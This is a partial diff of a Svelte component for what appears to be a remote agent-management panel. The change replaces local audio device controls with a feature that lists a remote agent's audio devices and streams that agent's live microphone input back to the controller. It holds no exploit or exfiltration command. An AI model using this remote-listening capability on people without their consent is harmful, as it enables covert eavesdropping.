-                                const entry: AudioDevice = {
-                                        id,
-                                        deviceId: device.deviceId,
-                                        label,
-                                        kind,
-                                        groupId: device.groupId ?? '',
-                                        systemDefault: device.deviceId === 'default',
-                                        communicationsDefault: device.deviceId === 'communications',
-                                        lastSeen: new Date().toISOString()
-                                };
-                                if (!nextControls[id]) {
-                                        nextControls[id] = createDefaultControl(kind);
-                                }
-                                if (kind === 'input') {
-                                        nextInputs.push(entry);
-                                } else {
-                                        nextOutputs.push(entry);
-                                }
+        async function loadSessionState() {
+                if (!isBrowser) {
+                        return;
+                }
+                try {
+                        const response = await fetch(`/api/agents/${client.id}/audio/session`);
+                        if (!response.ok) {
+                                throw new Error(`Status ${response.status}`);
                         }
-
-                        nextInputs.sort((a, b) => a.label.localeCompare(b.label));
-                        nextOutputs.sort((a, b) => a.label.localeCompare(b.label));
-
-                        const validIds = new Set([...nextInputs, ...nextOutputs].map((device) => device.id));
-                        for (const id of Object.keys(nextControls)) {
-                                if (!validIds.has(id)) {
-                                        delete nextControls[id];
-                                }
+                        const body = (await response.json()) as { session: AudioSessionState | null };
+                        session = body.session ?? null;
+                        if (session?.active) {
+                                listening = true;
+                                openStream(session.sessionId);
                         }
+                } catch (err) {
+                        sessionError = (err as Error).message ?? 'Failed to load audio session state.';
+                }
+        }
 
-                        inputs = nextInputs;
-                        outputs = nextOutputs;
-                        deviceControls = nextControls;
+        async function startListening(device: AudioDeviceDescriptor) {
+                if (!isBrowser) {
+                        return;
+                }
+                if (device.kind !== 'input') {
+                        sessionError = 'Only input devices can be monitored currently.';
+                        return;
+                }
+                const label = device.label ?? device.id;
+                await stopListening(true);
+                sessionError = null;
+                playbackError = null;
+                try {
+                        const response = await fetch(`/api/agents/${client.id}/audio/session`, {
+                                method: 'POST',
+                                headers: { 'Content-Type': 'application/json' },
+                                body: JSON.stringify({
+                                        deviceId: device.id,
+                                        deviceLabel: device.label,
+                                        direction: device.kind
+                                })
+                        });
+                        if (!response.ok) {
+                                throw new Error(`Status ${response.status}`);
+                        }
+                        const body = (await response.json()) as { session: AudioSessionState | null };
+                        session = body.session;
+                        if (!session) {
+                                throw new Error('Session was not created.');
+                        }
+                        listening = true;
+                        logAction('Audio session started', label);
+                        openStream(session.sessionId);
+                } catch (err) {
+                        listening = false;
+                        sessionError = (err as Error).message ?? 'Failed to start audio session.';
+                        logAction('Audio session start failed', sessionError ?? '', 'failed');
+                }
+        }
 
-                        syncSelection();
-                        syncDetailDevice();
-                        updateAudioGraphControls();
-                } catch (error) {
-                        if (error instanceof DOMException && error.name === 'NotAllowedError') {
-                                enumerateError =
-                                        'Microphone access was denied. Device names may be limited until permission is granted.';
-                        } else if (error instanceof DOMException && error.name === 'NotFoundError') {
-                                enumerateError = 'No audio hardware is currently available.';
-                        } else {
-                                enumerateError = (error as Error).message ?? 'Failed to enumerate audio devices.';
+        async function stopListening(silent = false) {
+                if (!isBrowser) {
+                        cleanupPlayback();
+                        listening = false;
+                        return;
+                }
+                const current = session;
+                const label = current?.deviceLabel ?? current?.sessionId ?? 'session';
+                if (!current) {
+                        cleanupPlayback();
+                        listening = false;
+                        return;
+                }
+                try {
+                        const response = await fetch(`/api/agents/${client.id}/audio/session`, {
+                                method: 'DELETE',
+                                headers: { 'Content-Type': 'application/json' },
+                                body: JSON.stringify({ sessionId: current.sessionId })
+                        });
+                        if (response.ok) {
+                                const body = (await response.json()) as { session: AudioSessionState | null };
+                                session = body.session ?? null;
+                        }
+                } catch (err) {
+                        if (!silent) {
+                                sessionError = (err as Error).message ?? 'Failed to stop audio session.';
                         }
                 } finally {
-                        enumeratingDevices = false;
+                        cleanupPlayback();
+                        listening = false;
+                        if (!silent) {
+                                logAction('Audio session stopped', label);
+                        }
                 }
         }
 
-        function syncSelection() {
-                if (inputs.length === 0) {
-                        selectedInputId = null;
-                } else if (!selectedInputId || !inputs.some((device) => device.id === selectedInputId)) {
-                        const preferred =
-                                inputs.find((device) => device.systemDefault) ??
-                                inputs.find((device) => device.communicationsDefault) ??
-                                inputs[0];
-                        selectedInputId = preferred?.id ?? null;
-                }
-
-                let outputChanged = false;
-                if (outputs.length === 0) {
-                        outputChanged = selectedOutputId !== null;
-                        selectedOutputId = null;
-                } else {
-                        const preferred =
-                                outputs.find((device) => device.systemDefault) ??
-                                outputs.find((device) => device.communicationsDefault) ??
-                                outputs[0];
-                        const nextOutputId = preferred?.id ?? null;
-                        outputChanged = selectedOutputId !== nextOutputId;
-                        selectedOutputId = nextOutputId;
-                }
-
-                if (outputChanged && selectedOutputId) {
-                        void applyOutputSink(selectedOutputId);
-                }
-        }
-
-        function syncDetailDevice() {
-                if (!detailDevice) {
+        function openStream(sessionId: string) {
+                if (!isBrowser) {
                         return;
                 }
-                const next = [...inputs, ...outputs].find((device) => device.id === detailDevice?.id) ?? null;
-                detailDevice = next;
+                cleanupPlayback();
+                const url = new URL(`/api/agents/${client.id}/audio/stream`, window.location.origin);
+                url.searchParams.set('sessionId', sessionId);
+                const source = new EventSource(url.toString());
+                eventSource = source;
+                source.addEventListener('session', (event) => {
+                        const detail = JSON.parse((event as MessageEvent<string>).data) as AudioSessionState;
+                        session = detail;
+                });
+                source.addEventListener('chunk', (event) => {
+                        const detail = JSON.parse((event as MessageEvent<string>).data) as AudioStreamChunk;
+                        void handleChunk(detail);
+                });
+                source.addEventListener('stopped', () => {
+                        listening = false;
+                        playbackError = 'Audio session ended.';
+                        if (session) {
+                                session = { ...session, active: false } satisfies AudioSessionState;
+                        }
+                        cleanupPlayback();
+                });
+                source.onerror = () => {
+                        playbackError = 'Audio stream interrupted.';
+                };
         }
 
-        function ensureAudioGraph(): boolean {
-                if (!isBrowser || typeof AudioContext === 'undefined') {
-                        playbackError = 'Audio playback is not supported in this environment.';
-                        return false;
-                }
-                if (!audioContext) {
-                        audioContext = new AudioContext();
-                }
-                if (!audioElement) {
-                        audioElement = new Audio(TEST_TONE_URL);
-                        audioElement.preload = 'auto';
-                        audioElement.crossOrigin = 'anonymous';
-                        audioElement.addEventListener('ended', handlePlaybackEnded);
-                }
-                if (!mediaSource && audioContext && audioElement) {
-                        mediaSource = audioContext.createMediaElementSource(audioElement);
-                }
-                if (!gainNode && audioContext) {
-                        gainNode = audioContext.createGain();
-                }
-                if (!stereoPanner && audioContext) {
-                        stereoPanner = audioContext.createStereoPanner();
-                }
-                if (mediaSource && gainNode && stereoPanner && audioContext && !audioGraphInitialised) {
-                        mediaSource.connect(gainNode);
-                        gainNode.connect(stereoPanner);
-                        stereoPanner.connect(audioContext.destination);
-                        audioGraphInitialised = true;
-                }
-                updateAudioGraphControls();
-                return true;
-        }
-
-        function cleanupAudioGraph() {
-                stopPlaybackTimer();
-                playbackState = 'idle';
-                playbackPosition = 0;
-                playbackDuration = 0;
-                if (audioElement) {
-                        audioElement.pause();
-                        audioElement.removeEventListener('ended', handlePlaybackEnded);
-                        audioElement.src = '';
-                        audioElement.load();
-                        audioElement = null;
-                }
-                if (mediaSource) {
-                        try {
-                                mediaSource.disconnect();
-                        } catch {
-                                // ignore
-                        }
-                        mediaSource = null;
-                }
-                if (gainNode) {
-                        try {
-                                gainNode.disconnect();
-                        } catch {
-                                // ignore
-                        }
-                        gainNode = null;
-                }
-                if (stereoPanner) {
-                        try {
-                                stereoPanner.disconnect();
-                        } catch {
-                                // ignore
-                        }
-                        stereoPanner = null;
+        function cleanupPlayback() {
+                if (eventSource) {
+                        eventSource.close();
+                        eventSource = null;
                 }
                 if (audioContext) {
                         audioContext.close().catch(() => {});
                         audioContext = null;
                 }
-                audioGraphInitialised = false;
+                playbackQueueTime = 0;
         }
 
-        function updateAudioGraphControls() {
-                if (!audioElement) {
-                        return;
+        async function ensureAudioContext(sampleRate: number): Promise<boolean> {
+                if (!isBrowser) {
+                        return false;
                 }
-                const deviceId = selectedOutputId;
-                if (!deviceId) {
-                        return;
-                }
-                const control = deviceControls[deviceId];
-                if (!control) {
-                        return;
-                }
-                const volume = control.muted ? 0 : clamp(control.volume / 100, 0, 1);
-                audioElement.muted = control.muted;
-                audioElement.volume = volume;
-                if (gainNode) {
-                        gainNode.gain.value = volume;
-                }
-                if (stereoPanner) {
-                        stereoPanner.pan.value = clamp(control.balance, -1, 1);
-                }
-        }
-
-        async function applyOutputSink(deviceId: string) {
-                if (!audioElement) {
-                        return;
-                }
-                const device = outputs.find((item) => item.id === deviceId);
-                if (!device) {
-                        return;
-                }
-                const element = audioElement as HTMLAudioElement & { setSinkId?: (sinkId: string) => Promise<void> };
-                if (typeof element.setSinkId === 'function') {
+                if (!audioContext) {
                         try {
-                                await element.setSinkId(device.deviceId);
-                        } catch (error) {
-                                playbackError =
-                                        (error as Error).message ?? 'Failed to route audio to the selected output device.';
+                                audioContext = new AudioContext();
+                        } catch {
+                                playbackError = 'Audio playback is not supported in this environment.';
+                                return false;
                         }
+                        playbackQueueTime = audioContext.currentTime;
                 }
-        }
-
-        function updateVolume(device: AudioDevice, rawValue: number, commit: boolean) {
-                const normalized = clamp(Math.round(rawValue), 0, 100);
-                const existing = deviceControls[device.id] ?? createDefaultControl(device.kind);
-                deviceControls = {
-                        ...deviceControls,
-                        [device.id]: { ...existing, volume: normalized }
-                };
-                if (device.kind === 'output' && device.id === selectedOutputId) {
-                        updateAudioGraphControls();
-                }
-                if (commit) {
-                        const action = device.kind === 'input' ? 'Input gain adjusted' : 'Output volume adjusted';
-                        logAction(action, `${device.label} · ${normalized}%`);
-                }
-        }
-
-        function toggleMute(device: AudioDevice, muted: boolean) {
-                const existing = deviceControls[device.id] ?? createDefaultControl(device.kind);
-                if (existing.muted === muted) {
-                        return;
-                }
-                deviceControls = {
-                        ...deviceControls,
-                        [device.id]: { ...existing, muted }
-                };
-                if (device.kind === 'output' && device.id === selectedOutputId) {
-                        updateAudioGraphControls();
-                }
-                logAction(
-                        `${device.kind === 'input' ? 'Input' : 'Output'} ${muted ? 'muted' : 'unmuted'}`,
-                        device.label
-                );
-        }
-
-        function updateBalance(device: AudioDevice, rawValue: number, commit: boolean) {
-                const normalized = clamp(rawValue, -100, 100) / 100;
-                const existing = deviceControls[device.id] ?? createDefaultControl(device.kind);
-                deviceControls = {
-                        ...deviceControls,
-                        [device.id]: { ...existing, balance: normalized }
-                };
-                if (device.kind === 'output' && device.id === selectedOutputId) {
-                        updateAudioGraphControls();
-                }
-                if (commit) {
-                        logAction('Output balance adjusted', `${device.label} · ${formatBalance(normalized)}`);
-                }
-        }
-
-        function setDefaultDevice(device: AudioDevice) {
-                if (device.kind === 'input') {
-                        if (selectedInputId === device.id) {
-                                return;
-                        }
-                        selectedInputId = device.id;
-                        logAction('Default input updated', device.label);
-                        return;
-                }
-                if (selectedOutputId === device.id) {
-                        return;
-                }
-                selectedOutputId = device.id;
-                void applyOutputSink(device.id);
-                updateAudioGraphControls();
-                logAction('Default output updated', device.label);
-        }
-
-        async function playTestSound() {
-                playbackError = null;
-                if (!ensureAudioGraph() || !audioElement) {
-                        return;
-                }
-                try {
-                        if (audioContext?.state === 'suspended') {
+                if (audioContext.state === 'suspended') {
+                        try {
                                 await audioContext.resume();
+                        } catch {
+                                // ignore resume errors
                         }
-                        audioElement.currentTime = 0;
-                        await audioElement.play();
-                        playbackState = 'playing';
-                        playbackDuration = Number.isFinite(audioElement.duration) ? audioElement.duration : 0;
-                        startPlaybackTimer();
-                        logAction('Test tone started', selectedOutputLabel());
-                } catch (error) {
-                        playbackError = (error as Error).message ?? 'Unable to start playback.';
                 }
+                // AudioBuffer resamples automatically to the context sample rate.
+                void sampleRate;
+                return true;
         }
 
-        function pauseTestSound() {
-                if (!audioElement || playbackState !== 'playing') {
-                        return;
-                }
-                audioElement.pause();
-                playbackState = 'paused';
-                stopPlaybackTimer(false);
-                logAction('Test tone paused', selectedOutputLabel());
-        }
-
-        function stopTestSound() {
-                if (!audioElement || playbackState === 'idle') {
-                        return;
-                }
-                audioElement.pause();
-                audioElement.currentTime = 0;
-                playbackState = 'idle';
-                stopPlaybackTimer();
-                logAction('Test tone stopped', selectedOutputLabel());
-        }
-
-        function startPlaybackTimer() {
-                stopPlaybackTimer(false);
-                playbackTimer = setInterval(() => {
-                        if (!audioElement) {
-                                return;
+        function decodePcm(data: string): Int16Array | null {
+                try {
+                        const binary = atob(data);
+                        if (binary.length % 2 !== 0) {
+                                return null;
                         }
-                        playbackPosition = audioElement.currentTime;
-                        if (Number.isFinite(audioElement.duration)) {
-                                playbackDuration = audioElement.duration;
+                        const buffer = new ArrayBuffer(binary.length);
+                        const bytes = new Uint8Array(buffer);
+                        for (let i = 0; i < binary.length; i += 1) {
+                                bytes[i] = binary.charCodeAt(i);
                         }
-                        if (audioElement.ended) {
-                                playbackState = 'idle';
-                                stopPlaybackTimer();
-                        }
-                }, 200);
-        }
-
-        function stopPlaybackTimer(reset = true) {
-                if (playbackTimer) {
-                        clearInterval(playbackTimer);
-                        playbackTimer = null;
-                }
-                if (reset) {
-                        playbackPosition = 0;
-                }
-        }
-
-        function handlePlaybackEnded() {
-                playbackState = 'idle';
-                stopPlaybackTimer();
-                logAction('Test tone completed', selectedOutputLabel());
-        }
-
-        async function handleRequestAccess() {
-                await enumerateDevices(true);
-        }
-
-        async function handleRefresh() {
-                await enumerateDevices(false);
-        }
-
-        async function inspectInputDevice(device: AudioDevice): Promise<DeviceDiagnostics | null> {
-                if (!navigator.mediaDevices?.getUserMedia) {
+                        return new Int16Array(buffer);
+                } catch {
                         return null;
                 }
-                const constraints: MediaStreamConstraints = {
-                        audio:
-                                device.deviceId === 'default' || device.deviceId === ''
-                                        ? true
-                                        : { deviceId: { exact: device.deviceId } },
-                        video: false
-                };
-                const stream = await navigator.mediaDevices.getUserMedia(constraints);
-                permissionState = 'granted';
-                try {
-                        const [track] = stream.getAudioTracks();
-                        const settings = (track?.getSettings?.() ?? {}) as MediaTrackSettings & {
-                                latency?: number;
-                        };
-                        return {
-                                sampleRate:
-                                        typeof settings.sampleRate === 'number' ? Math.round(settings.sampleRate) : null,
-                                channelCount:
-                                        typeof settings.channelCount === 'number' ? Math.round(settings.channelCount) : null,
-                                latency: typeof settings.latency === 'number' ? settings.latency : null,
-                                echoCancellation:
-                                        typeof settings.echoCancellation === 'boolean'
-                                                ? settings.echoCancellation
-                                                : null,
-                                noiseSuppression:
-                                        typeof settings.noiseSuppression === 'boolean'
-                                                ? settings.noiseSuppression
-                                                : null,
-                                autoGainControl:
-                                        typeof settings.autoGainControl === 'boolean'
-                                                ? settings.autoGainControl
-                                                : null
-                        } satisfies DeviceDiagnostics;
-                } finally {
-                        stream.getTracks().forEach((track) => {
-                                try {
-                                        track.stop();
-                                } catch {
-                                        // ignore
-                                }
-                        });
-                }
         }
 
-        async function inspectOutputDevice(): Promise<DeviceDiagnostics | null> {
-                if (!ensureAudioGraph()) {
-                        return null;
-                }
-                return {
-                        sampleRate: audioContext?.sampleRate ?? null,
-                        channelCount: audioContext?.destination?.maxChannelCount ?? null,
-                        latency: audioContext?.baseLatency ?? null,
-                        echoCancellation: null,
-                        noiseSuppression: null,
-                        autoGainControl: null
-                } satisfies DeviceDiagnostics;
-        }
-
-        async function openDeviceDetails(device: AudioDevice) {
-                detailDevice = device;
-                detailDialogOpen = true;
-                detailError = null;
-                if (deviceDiagnostics[device.id]) {
-                        detailLoading = false;
+        function schedulePlayback(format: AudioStreamChunk['format'], pcm: Int16Array) {
+                if (!audioContext) {
                         return;
                 }
-                detailLoading = true;
-                try {
-                        const diagnostics =
-                                device.kind === 'input'
-                                        ? await inspectInputDevice(device)
-                                        : await inspectOutputDevice();
-                        if (diagnostics) {
-                                deviceDiagnostics = { ...deviceDiagnostics, [device.id]: diagnostics };
+                const channels = Math.max(1, Math.min(2, format.channels ?? 1));
+                const frameCount = Math.floor(pcm.length / channels);
+                if (frameCount <= 0) {
+                        return;
+                }
+                const buffer = audioContext.createBuffer(channels, frameCount, format.sampleRate);
+                for (let channel = 0; channel < channels; channel += 1) {
+                        const channelData = buffer.getChannelData(channel);
+                        for (let frame = 0; frame < frameCount; frame += 1) {
+                                const sampleIndex = frame * channels + channel;
+                                const value = pcm[sampleIndex] / 32768;
+                                channelData[frame] = Math.max(-1, Math.min(1, value));
                         }
-                        detailLoading = false;
-                        logAction('Device diagnostics viewed', device.label);
-                } catch (error) {
-                        detailError = (error as Error).message ?? 'Unable to load device diagnostics.';
-                        detailLoading = false;
                 }
+                const source = audioContext.createBufferSource();
+                source.buffer = buffer;
+                source.connect(audioContext.destination);
+                const startAt = Math.max(audioContext.currentTime + 0.05, playbackQueueTime);
+                source.start(startAt);
+                playbackQueueTime = startAt + buffer.duration;
         }
 
-        $effect(() => {
-                if (!detailDialogOpen) {
-                        detailDevice = null;
-                        detailError = null;
-                        detailLoading = false;
-                }
-        });
-
-        onMount(() => {
-                mediaSupported =
-                        isBrowser && typeof navigator.mediaDevices?.enumerateDevices === 'function';
-                if (!mediaSupported) {
-                        enumerateError = 'Media devices API is not available in this environment.';
+        async function handleChunk(chunk: AudioStreamChunk) {
+                if (!(await ensureAudioContext(chunk.format.sampleRate))) {
                         return;
                 }
-                void refreshPermissionState();
-                void enumerateDevices(false);
-                deviceChangeListener = () => {
-                        void enumerateDevices(false);
-                };
-                navigator.mediaDevices.addEventListener('devicechange', deviceChangeListener);
+                const pcm = decodePcm(chunk.data);
+                if (!pcm) {
+                        playbackError = 'Received malformed audio data.';
+                        return;
+                }
+                playbackError = null;
+                if (session) {
+                        session = {
+                                ...session,
+                                lastSequence: chunk.sequence,
+                                lastUpdatedAt: chunk.timestamp
+                        } satisfies AudioSessionState;
+                }
+                schedulePlayback(chunk.format, pcm);
+        }
+
+        onMount(async () => {
+                if (!isBrowser) {
+                        return;
+                }
+                await loadInventory();
+                await loadSessionState();
         });
 
         onDestroy(() => {
-                if (deviceChangeListener && navigator.mediaDevices?.removeEventListener) {
-                        navigator.mediaDevices.removeEventListener('devicechange', deviceChangeListener);
-                }
-                cleanupAudioGraph();
+                void stopListening(true);
         });
 </script>
 
 <div class="space-y-6">
         <ClientWorkspaceHero
-                {client}
-                {tool}
-                metadata={[
-                        {
-                                label: 'Pipeline',
-                                value: pipeline,
-                                hint: 'Loopback taps the system mix, dual includes microphone and playback channels.'
-                        },
-                        {
-                                label: 'Codec',
-                                value: codec.toUpperCase()
-                        },
-                        {
-                                label: 'Input device',
-                                value: selectedInputLabel(),
-                                hint: `${inputs.length} detected`
-                        },
-                        {
-                                label: 'Output device',
-                                value: selectedOutputLabel(),
-                                hint: `${outputs.length} detected`
-                        }
-                ]}
-        >
-                <p>
-                        Prepare capture, monitoring, and playback flows while staying in control of every channel.
-                        Enumerate microphones, loopback buses, and speakers, adjust live gain and balance, and stage
-                        transport plans before wiring them into the agent runtime.
-                </p>
-        </ClientWorkspaceHero>
+                title={tool.title}
+                description="Review agent-side audio hardware, capture live microphone input, and bridge sound back to the controller."
+        />
 
-        <Card>
-                <CardHeader>
-                        <CardTitle class="text-base">Capture configuration</CardTitle>
-                        <CardDescription>Define the encoding strategy for the audio bridge.</CardDescription>
-                </CardHeader>
-                <CardContent class="space-y-6">
-                        <div class="grid gap-4 md:grid-cols-3">
-                                <div class="grid gap-2">
-                                        <Label for="audio-pipeline">Source pipeline</Label>
-                                        <Select
-                                                type="single"
-                                                value={pipeline}
-                                                onValueChange={(value) => (pipeline = value as typeof pipeline)}
-                                        >
-                                                <SelectTrigger id="audio-pipeline" class="w-full">
-                                                        <span class="capitalize">{pipeline}</span>
-                                                </SelectTrigger>
-                                                <SelectContent>
-                                                        <SelectItem value="microphone">Microphone</SelectItem>
-                                                        <SelectItem value="loopback">Loopback</SelectItem>
-                                                        <SelectItem value="dual">Dual (mic + loopback)</SelectItem>
-                                                </SelectContent>
-                                        </Select>
-                                        <label class="flex items-center justify-between gap-3 rounded-lg border border-border/60 bg-muted/30 p-3">
-                                                <div>
-                                                        <p class="text-sm font-medium text-foreground">Push to talk</p>
-                                                        <p class="text-xs text-muted-foreground">Operator toggles microphone injection</p>
-                                                </div>
-                                                <Switch bind:checked={pushToTalk} />
-                                        </label>
-                                        <label class="flex items-center justify-between gap-3 rounded-lg border border-border/60 bg-muted/30 p-3">
-                                                <div>
-                                                        <p class="text-sm font-medium text-foreground">Echo cancellation</p>
-                                                        <p class="text-xs text-muted-foreground">Applies digital signal processing on stream</p>
-                                                </div>
-                                                <Switch bind:checked={echoCancellation} />
-                                        </label>
-                                </div>
-                        </div>
-
-                        <label class="flex items-center justify-between gap-3 rounded-lg border border-border/60 bg-muted/30 p-3 md:w-1/2">
+        <div class="grid gap-6 lg:grid-cols-[2fr,1fr]">
+                <Card>
+                        <CardHeader class="flex flex-col gap-2 sm:flex-row sm:items-center sm:justify-between">
                                 <div>
-                                        <p class="text-sm font-medium text-foreground">Noise suppression</p>
-                                        <p class="text-xs text-muted-foreground">Reduces ambient noise in the capture buffer</p>
+                                        <CardTitle>Agent audio inventory</CardTitle>
+                                        <CardDescription>
+                                                Discover capture and playback devices reported by the client. Refresh to request a new hardware scan.
+                                        </CardDescription>
                                 </div>
-                                <Switch bind:checked={noiseSuppression} />
-                        </label>
-                </CardContent>
-                <CardFooter class="flex flex-wrap gap-3">
-                        <Button type="button" variant="outline" onclick={() => queueCapture('draft')}>
-                                Save draft
-                        </Button>
-                        <Button type="button" onclick={() => queueCapture('queued')}>
-                                Queue capture
-                        </Button>
-                </CardFooter>
-        </Card>
+                                <div class="flex items-center gap-2">
+                                        {#if pendingInventory}
+                                                <Badge variant="secondary">Pending update</Badge>
+                                        {/if}
+                                        <Button on:click={refreshInventory} disabled={refreshingInventory}>Refresh</Button>
+                                </div>
+                        </CardHeader>
+                        <CardContent class="space-y-4">
+                                {#if inventoryError}
+                                        <p class="text-sm text-destructive">{inventoryError}</p>
+                                {/if}
+                                {#if !inventory}
+                                        <p class="text-sm text-muted-foreground">
+                                                No inventory is currently available. Request a refresh to collect the agent's audio hardware list.
+                                        </p>
+                                {:else}
+                                        <div class="space-y-3">
+                                                <div>
+                                                        <h3 class="text-sm font-medium text-foreground/80">Input devices</h3>
+                                                        {#if inventory.inputs.length === 0}
+                                                                <p class="text-sm text-muted-foreground">No audio inputs were reported.</p>
+                                                        {:else}
+                                                                <div class="mt-2 space-y-2">
+                                                                        {#each inventory.inputs as device (device.id)}
+                                                                                <div class="flex flex-col gap-2 rounded-lg border border-border/60 p-3 sm:flex-row sm:items-center sm:justify-between">
+                                                                                        <div class="space-y-1">
+                                                                                                <div class="flex items-center gap-2">
+                                                                                                        <span class="font-medium">{device.label}</span>
+                                                                                                        {#if device.systemDefault}
+                                                                                                                <Badge variant="outline">Default</Badge>
+                                                                                                        {/if}
+                                                                                                </div>
+                                                                                                <p class="text-xs text-muted-foreground">{device.id}</p>
+                                                                                        </div>
+                                                                                        <div class="flex items-center gap-2">
+                                                                                                <Button
+                                                                                                        size="sm"
+                                                                                                        variant="outline"
+                                                                                                        disabled={refreshingInventory}
+                                                                                                        on:click={() => startListening(device)}
+                                                                                                >
+                                                                                                        {listening && session?.deviceId === device.id ? 'Listening…' : 'Listen'}
+                                                                                                </Button>
+                                                                                        </div>
+                                                                                </div>
+                                                                        {/each}
+                                                                </div>
+                                                        {/if}
+                                                </div>
+                                                <div>
+                                                        <h3 class="text-sm font-medium text-foreground/80">Output devices</h3>
+                                                        {#if inventory.outputs.length === 0}
+                                                                <p class="text-sm text-muted-foreground">No audio outputs were reported.</p>
+                                                        {:else}
+                                                                <p class="text-sm text-muted-foreground">
+                                                                        Output capture is not yet available. These devices are listed for reference only.
+                                                                </p>
+                                                        {/if}
+                                                </div>
+                                        </div>
+                                {/if}
+                        </CardContent>
+                </Card>
 
-        <Card>
-                <CardHeader>
-                        <CardTitle class="text-base">Device inventory</CardTitle>
-                        <CardDescription>
-                                Monitor microphones, loopback feeds, and playback channels. Adjust volume, mute state, and
-                                defaults in real time.
-                        </CardDescription>
-                </CardHeader>
-                <CardContent class="space-y-6">
-                        <div class="flex flex-wrap items-start justify-between gap-4">
-                                <div class="space-y-2">
-                                        <p class="text-sm font-medium text-foreground">Discovery status</p>
-                                        <p class="text-xs text-muted-foreground">
-                                                {#if !mediaSupported}
-                                                        Media device APIs are unavailable in this environment.
-                                                {:else if enumeratingDevices}
-                                                        Enumerating devices…
-                                                {:else if inputs.length + outputs.length === 0}
-                                                        No audio hardware detected. Connect a device or request access to reveal inventory.
-                                                {:else}
-                                                        Tracking {inputs.length} input{inputs.length === 1 ? '' : 's'} and {outputs.length}
-                                                        output{outputs.length === 1 ? '' : 's'}.
+                <Card>
+                        <CardHeader>
+                                <CardTitle>Audio bridge session</CardTitle>
+                                <CardDescription>
+                                        Establish or release a live audio stream from the agent back to the controller.
+                                </CardDescription>
+                        </CardHeader>
+                        <CardContent class="space-y-3">
+                                {#if sessionError}
+                                        <p class="text-sm text-destructive">{sessionError}</p>
+                                {/if}
+                                {#if playbackError}
+                                        <p class="text-sm text-warning-foreground">{playbackError}</p>
+                                {/if}
+                                {#if session}
+                                        <div class="space-y-2 text-sm">
+                                                <div class="flex items-center gap-2">
+                                                        <span class="font-medium text-foreground">{session.deviceLabel ?? 'Unknown device'}</span>
+                                                        {#if listening && session.active}
+                                                                <Badge>Streaming</Badge>
+                                                        {:else if session.active}
+                                                                <Badge variant="secondary">Pending</Badge>
+                                                        {:else}
+                                                                <Badge variant="outline">Stopped</Badge>
+                                                        {/if}
+                                                </div>
+                                                <p class="text-muted-foreground">Session ID: {session.sessionId}</p>
+                                                <p class="text-muted-foreground">Direction: {session.direction}</p>
+                                                <p class="text-muted-foreground">
+                                                        Format: {session.format.sampleRate} Hz · {session.format.channels} {session.format.channels === 1 ? 'channel' : 'channels'}
+                                                </p>
+                                                {#if session.lastUpdatedAt}
+                                                        <p class="text-muted-foreground">Last update: {new Date(session.lastUpdatedAt).toLocaleString()}</p>
                                                 {/if}
-                                        </p>
-                                        <div class="flex flex-wrap gap-2">
-                                                <Badge variant="outline">Permission: {permissionLabel()}</Badge>
-                                                <Badge variant="outline">Inputs: {inputs.length}</Badge>
-                                                <Badge variant="outline">Outputs: {outputs.length}</Badge>
-                                        </div>
-                                </div>
-                                <div class="flex flex-wrap gap-2">
-                                        <Button
-                                                type="button"
-                                                variant="outline"
-                                                onclick={handleRefresh}
-                                                disabled={!mediaSupported || enumeratingDevices}
-                                        >
-                                                Refresh
-                                        </Button>
-                                        <Button
-                                                type="button"
-                                                onclick={handleRequestAccess}
-                                                disabled={!mediaSupported || enumeratingDevices || permissionState === 'granted'}
-                                        >
-                                                Request access
-                                        </Button>
-                                </div>
-                        </div>
-
-                        {#if enumerateError}
-                                <p class="text-sm text-destructive">{enumerateError}</p>
-                        {/if}
-
-                        <div class="grid gap-6 xl:grid-cols-2">
-                                <section class="space-y-4">
-                                        <div>
-                                                <h3 class="text-sm font-semibold text-foreground">Input devices</h3>
-                                                <p class="text-xs text-muted-foreground">
-                                                        Configure capture gain, mute state, and metadata for microphones and loopback sources.
-                                                </p>
-                                        </div>
-                                        {#if inputs.length === 0}
-                                                <p class="rounded-lg border border-border/60 bg-muted/40 p-4 text-sm text-muted-foreground">
-                                                        No audio inputs detected. Connect a microphone or grant permission to reveal available
-                                                        devices.
-                                                </p>
-                                        {:else}
-                                                <ul class="space-y-4">
-                                                        {#each inputs as device (device.id)}
-                                                                {@const control = deviceControls[device.id] ?? createDefaultControl('input')}
-                                                                <li class="space-y-4 rounded-lg border border-border/60 bg-muted/30 p-4">
-                                                                        <div class="flex flex-col gap-2 md:flex-row md:items-start md:justify-between">
-                                                                                <div class="space-y-1">
-                                                                                        <p class="font-medium text-foreground">{device.label}</p>
-                                                                                        <p class="text-xs text-muted-foreground">
-                                                                                                Status: {deviceStatus(device)} · Last seen {formatTimestamp(device.lastSeen)}
-                                                                                        </p>
-                                                                                        {#if device.groupId}
-                                                                                                <p class="text-xs text-muted-foreground">Group: {device.groupId}</p>
-                                                                                        {/if}
-                                                                                </div>
-                                                                                <div class="flex flex-wrap justify-end gap-2">
-                                                                                        {#if device.systemDefault}
-                                                                                                <Badge variant="outline">System default</Badge>
-                                                                                        {/if}
-                                                                                        {#if device.communicationsDefault}
-                                                                                                <Badge variant="outline">Communications</Badge>
-                                                                                        {/if}
-                                                                                        {#if selectedInputId === device.id}
-                                                                                                <Badge variant="secondary">Workspace default</Badge>
-                                                                                        {/if}
-                                                                                </div>
-                                                                        </div>
-                                                                        <div class="space-y-3">
-                                                                                <div class="space-y-1">
-                                                                                        <div class="flex items-center justify-between text-xs uppercase tracking-wide text-muted-foreground">
-                                                                                                <span>Gain</span>
-                                                                                                <span>{control.muted ? 'Muted' : `${control.volume}%`}</span>
-                                                                                        </div>
-                                                                                        <input
-                                                                                                type="range"
-                                                                                                min="0"
-                                                                                                max="100"
-                                                                                                step="1"
-                                                                                                value={control.volume}
-                                                                                                oninput={(event) =>
-                                                                                                        updateVolume(
-                                                                                                                device,
-                                                                                                                Number(
-                                                                                                                        (event.currentTarget as HTMLInputElement).value
-                                                                                                                ),
-                                                                                                                false
-                                                                                                        )
-                                                                                                }
-                                                                                                onchange={(event) =>
-                                                                                                        updateVolume(
-                                                                                                                device,
-                                                                                                                Number(
-                                                                                                                        (event.currentTarget as HTMLInputElement).value
-                                                                                                                ),
-                                                                                                                true
-                                                                                                        )
-                                                                                                }
-                                                                                                class="h-1.5 w-full cursor-pointer appearance-none rounded-full bg-muted accent-primary"
-                                                                                                aria-label={`Adjust gain for ${device.label}`}
-                                                                                        />
-                                                                                </div>
-                                                                                <div class="flex items-center justify-between gap-3 rounded-lg border border-border/60 bg-background/60 p-3">
-                                                                                        <div>
-                                                                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Mute</p>
